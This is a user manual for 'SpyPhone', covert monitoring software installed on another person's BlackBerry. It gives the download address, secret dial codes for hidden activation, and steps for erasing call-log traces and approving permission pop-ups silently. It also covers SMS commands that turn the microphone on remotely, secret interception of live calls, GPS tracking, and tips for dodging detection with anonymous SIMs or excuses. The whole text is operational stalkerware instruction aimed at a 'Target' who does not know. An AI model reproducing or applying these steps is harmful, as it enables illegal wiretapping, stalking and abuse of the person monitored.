Manual
The SpyPhone software is activated using an Activation Code which is valid for one year.
Downloading And Installing
1. Open the Internet Browser, and go to the web address, http://dd.mobilebackup.me/bbs/b.jad
f to link and installation download.
2. Select“Download”. And installation will begin automatically.
3
Activate The Software
After installation the product must be activated and configured using the “SECRET SETTINGS” screen.
1. To open “Secret Settings” screen, enter *#900900900, then press the green CALL key, followed by the
red END CALL key. On some versions of Blackberry pressing the END CALL key will make the setting
screen disappear. If this happens, try again and do not press the END CALL key at all.
2. The program must find a proper Internet connection to the server. Press OK to begin.
3. If the product is not yet active, you will be asked to activate the product.
4
4. Then press MENU Key ACTIVATE
5. Enter your “ACTIVATION CODE” and press “ACTIVATE”.(If your activation code is 123456789)
6. You will see “Activate success”. Press OK to set up your options.
If you can’t activate you either don’t have a BIS data plan or you are using an incorrect APN in the
Blackberry (phone) TCP settings. Check the trouble shooting guide at the end of this manual for help.
5
NOTE: After activation, the code to open the settings screen changes from *#900900900 to *#Activation
Code. So if your Activation Code is 123456789, after Activation you would open by dialing *#123456789
and immediately ending the call, as when using the default code before.
Any time you open the secret settings screen, always check the CALL LOG history to delete any record of
the *# number.
CUSTOM SETTINGS
Open the secret settings to make changes in how the Spy Phone software is controlled. To open the setting
screen please enter *#Activation Code. Then press the green CALL key, followed by the red END CALL key.
On some versions of Blackberry pressing the END CALL key will make the setting screen disappear. If this
happens, try again and do not press the END CALL key at all.
Note: transmitting events incurs GPRS data costs, but these can be minimized by selecting a large number
of events and long timer settings. These costs are very small, because the amount of data the software
transmits is small, but do check with your operator. From the phone bill it is not possible to determine
where the device is connecting to, but only the amount of data that was transmitted.
1. Report Timer: is used to set how often the application should report to server. The application will
report all captured events when this timer has elapsed.
We recommend setting REPORT TIMER: 1 hour (report once per hour)
6
2. Max Number Of Events: application will report to server when X number of events have been captured.
This works together with the above settings (either/or, whichever timer setting occurs first).
We recommend to set:
MAX NUMBER OF EVENTS: 10 events
3. Activies To Monitor: is used to set which events the application will capture. Tick or un-you’re your
choices.
We recommend selecting only the events important to you, to minimize data traffic. Emails will
consume the most data.
4. Monitoring Number: Shows the currently defined Monitor number. We recommend you not edit this
directly, but send the SMS command to turn on mic monitoring, which properly sets the Monitor
number (next section, Step21)
5. SIM Change: Makes the Target send a discreet SMS to the defined Monitor if the SIM card is changed,
providing the new number so you may continue making SpyCalls. (outgoing SMS alert is not kept in
Target logs)
7
6. GPS Change Refresh Time: Only shown if Target supports GPS. Defines how often to turn on GPS and
save the location data. Setting it too often may quickly drain the Target’s battery. GPS will be reported
with all other events according to Report Timer settings.
7. Watch All Numbers:
This setting allows you to receive SMS Alerts when the TARGET phone makes either an incoming or
outgoing phone call to any phone number.
After receiving SMS Alert, you need to make a call to the target phone. Your call will be patched into the
target’s conversation in secret.
Please note that Call Interception feature will work with phones on GSM networks only.
8. Capture Status: Once any item is selected, capturing should automatically begin. Pressing the button
performs the action stated.
Current Capture Status is noted at the bottom of the screen.
All options are saved dynamically. To exit settings screen after all options have been set, click Menu
Key/Close or simply press the End Call key. When exiting, you may be prompted to TEST CONNECTION if
you have not already.
8
COMPLETING BASIC SETUP
Do this to prevent incoming Spy Calls from showing up in the Target’s call logs. This step is not required for
Blackberry Storm and Blackberry Tour.
1. Press BlackBerry key> Press Menu Key > Options> General Options
2. Select phone list view, Change Phone List View to CALL LOG
If this is not done there is a possibility your incoming Spy Call could appear in the Target call logs. Not a
big problem as it does not affect the operation of the Spy Call, & you can always blame it on an
accidentally pressed speed dial. However if you set this correctly then your incoming SpyCalls should
never appear in the call history.
3. Verify Application Permissions
From your Monitor phone, send „tbdz‟ as an SMS text message to the Target phone (all lower case,
without the quote marks. Do not allow your monitor phone to automatically capitalize the text).
This is the default command to receive a Diagnostic Report, as an automatic SMS reply. This verifies the
program is working and has the required permissions. As a trouble-shooting resource, it may be
requested at any time to verify program status and settings.
Whenever the Target receives an SMS containing a defined command, it will send a reply SMS to the
number which sent the command, in this case the Diagnostic Report. All command responses are
discreet, as the outgoing SMS text is not saved in the Target’s SMS logs.
When the SMS is received on the Target, dialogue boxes may appear if any permissions haven’t been
set yet or were not saved properly
For all pop-ups that appear, select “Don’t ask this again” and then select “Allow this connection”.
If you do not see any permission boxes it means all permissions have already been set correctly.
9
Set Monitor Number by SMS Command
1. From your Monitor phone, send “bceq‟ as an SMS text message to the Target phone (all lower case,
without the quote marks). On the Target, select “Don’t ask this again” and then “Allow this connection”
for any pop-ups that might appear. You will receive an “OK” response to your Monitor phone.
2. bceq is the default command to turn on Spy Call mode (remote monitoring) for ANY number that sends
the command. After receiving the OK response, call the Target from your Monitor to verify it will
discreetly answer as a Spy Call.
Send SMS command to turn on Spy Call & automatically set your full Monitor number properly in the
settings. This is the preferred method. Spy Call may be turned on or off remotely for any number, at any
time. See SMS Control Section for more, next page.
When making a SpyCall, the Target phone may be go into hands free or speakerphone mode so you can
hear through the mic in 360 degrees (Omni-directional).Mute your Monitor phone to prevent the other
party from hearing sounds from your side.
Note: The Intercept Call feature is not compatible with CDMA networks. Please see note below for
more information.
IMPORTANT NOTE: Regarding Spy Call on GSM (AT&T/ T-Mobile/Others) or CDMA networks
(Sprint/Verizon/Others)
If the Target phone is not idle (is already on an active call, buttons are pressed, etc.) the Spy Call cannot
be performed.
In the case of GSM networks (ATT/T-Mobile), this will result in the Spy Call being REJECTED. You might
hear a busy signal or the call may be diverted to voice mail.
On CDMA networks (Sprint/Verizon) if the Target phone is ALREADY ON A CALL, the incoming SpyCall
will ring through as a normal Call Waiting call, with your Monitor number appearing on the Target’s
Caller ID and the normal Call Waiting beep heard. This is why Intercept Call is not CDMA compatible.
This is due to the way Blackberry handles the 2nd incoming call on CDMA networks. For this reason you
may want to use a cheap, prepaid SIM card or an otherwise anonymous number for the Monitor phone,
if your Target device is on a CDMA network. Or simply be prepared to say hello if the Target answers,
understanding that the Spy Call cannot work in this case anyway, because they were already on another
call at the time.
This is not an issue with GSM networks, which will automatically reject the Spy Call if an existing call is
already in progress. With both network types, Spy Call will automatically disconnect if any buttons are
pressed during an active Spy Call.
Call Interception: An Intercept Call is where an incoming call from the MONITOR number is patched into
any active call on the TARGET. If there is no active call, then the incoming call acts like a Spy Call.
If you enable the Watch List then Final edition will immediately send a hidden SMS notice from the
Target to your defined Monitor number, whenever an outgoing or incoming call becomes connected. If
you then call the Target from your Monitor, you will be automatically added to the Live Call in progress.
***TARGET PHONE MUST SUPPORT CONFERENCE CALL (GSM NETWORKS)***

Trouble Shooting
BACKGROUND:
Blackberry devices can connect to the Internet in a variety of ways. These connections may be restricted if
the device is part of a corporate network. A corporate network will use a BES server which may block
access.
The preferred and only officially supported connection is a Blackberry Data Plan with BIS connection
For users who are not part of a corporate network, then your access point to the Internet may not be
correctly set up.
Access Point is set in Options -> Advanced -> TCP. This should contain the details that allow the application
to connect to the internet. Please contact your network operator to ask how to set up your Internet Access
Point if you are unable to Activate the product.
Problem 1: i can not activate the software after i have downloaded it from the internet. I get an error ?
Problem 2: i can not get the test connection to work it always fails ?
Problem 3: i have no events on the internet web server ?
THESE PROBLEMS ARE USUALLY DUE TO A PROBLEM WITH INTERNET CONNECTIVITY
PROBLEM 1 and 2
The issue is that you cannot connect to the Internet. You either are not subscribed to a Blackberry Data
Plan (BIS connection) or you do not have a correct GPRS access point defined (APN). Please check the
settings in Options -> Advanced -> TCP -> APN. Your Target may not have this setting correctly configured.
PROBLEM 3
This problem may occur AFTER you have successfully Activated and the software has been working for
some time. Here are possible causes
1. Out of GPRS coverage.
2. The phone is out of credit.
3. The SIM card is changed.
4. Software has been removed / phone reformatted or OS upgraded
If you do not have access to the phone, send a diagnostic command to the phone. If you receive a response
this means the software is still working. If there is no response, the software has likely been removed by a
phone reformat, unless the Target is off or unable to send an SMS.
Examine the Diagnostic to see what the last connection status is. You can see a diagnostic report on page
12. If there is an error code and events are still saved in the program database, it means the program
cannot make a connection to the Internet. In this case the device will continue to capture and store the
events (as long as there is storage space available), and continue making the connection attempts
according to the configured schedule of the Report Timer. Events should be delivered to the web account
once a successful connection can be made.
17
DIAGNOSTICS
The Diagnostic Report offers detailed information to help troubleshoot connection problems and other
issues.
To retrieve diagnostics you have two choices:
You must either open up the CONTROL PANEL screen, and use the STATUS option.
If you don't have physical access to the device, you can receive the diagnostic by sending an SMS with
the command for Diagnostics to the Target phone. You will receive an SMS reply containing the
diagnostic information.
1. CONTROL PANEL METHOD
The status of the last connection, and the number of events transmitted. If there is an error you may
see an error code given.
The number of events waiting to be sent to your account (captured since last connection).
2. DIAGNOSTIC SMS METHOD
Here is the meaning of the diagnostics:
1> ProductCode, App Version
2> Platform
3> O.S version
4> SpyCall status (0/1), Monitor # (if defined)
5> Capturing status (0=off, 1=on)
